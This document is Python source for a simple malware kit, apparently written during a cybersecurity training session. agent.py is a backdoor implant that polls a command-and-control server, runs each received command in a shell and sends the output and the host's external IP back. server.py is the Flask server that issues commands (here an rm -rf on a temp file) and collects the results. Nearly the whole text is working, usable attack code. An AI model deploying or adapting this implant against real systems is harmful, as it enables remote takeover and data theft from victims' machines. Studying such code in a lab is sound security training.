ACS - our malware from adv cybersecurity PD on 15JUL21

agent.py

# pip3 install -U requests
import requests
import time
import subprocess


C2_SERVER = 'http://10.0.2.15:5000/' # our kali machines IP address

def get_ext_ip():
    response = requests.get('https://ifconfig.me/all.json')

    my_raw_ip_data = response.json()

    my_ext_ip = my_raw_ip_data.get('ip_addr')

    print( f'My external IP is {my_ext_ip}' )

    return my_ext_ip

def get_command():
    # response = requests.get(C2_SERVER+'new_command')
    response = requests.get(f'{C2_SERVER}/new_command')

    # print( f'This is the response: {response.text}' )
    new_command = response.text.split('::') # returns a list 
    just_the_command = new_command[1].strip()

    print(just_the_command)

    command_output = subprocess.run(just_the_command, shell=True, capture_output=True)

    command_output = command_output.stdout.decode()
    print(command_output)

    return command_output

def phone_home(data_to_send):
    payload = { 'computer_id': get_ext_ip(), 'data': data_to_send  }

    post_request = requests.post(f'{C2_SERVER}/cmd_output', data=payload) 


while True:
    command_output = get_command()
    phone_home(command_output)



    
    time.sleep(3)

server.py

# pip3 install -U flask
from flask import Flask, request

app = Flask(__name__)


@app.get('/')
def index():
    return "this is the index"

@app.get('/new_command')
def new_command_request():
    return "this is your new command:: rm -rf -v /tmp/somefile "

@app.post('/cmd_output')
def got_cmd_output():
    print(request.form.get('computer_id'))
    print(request.form.get('data'))
    
    return 'ok. got the daterz'


if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True)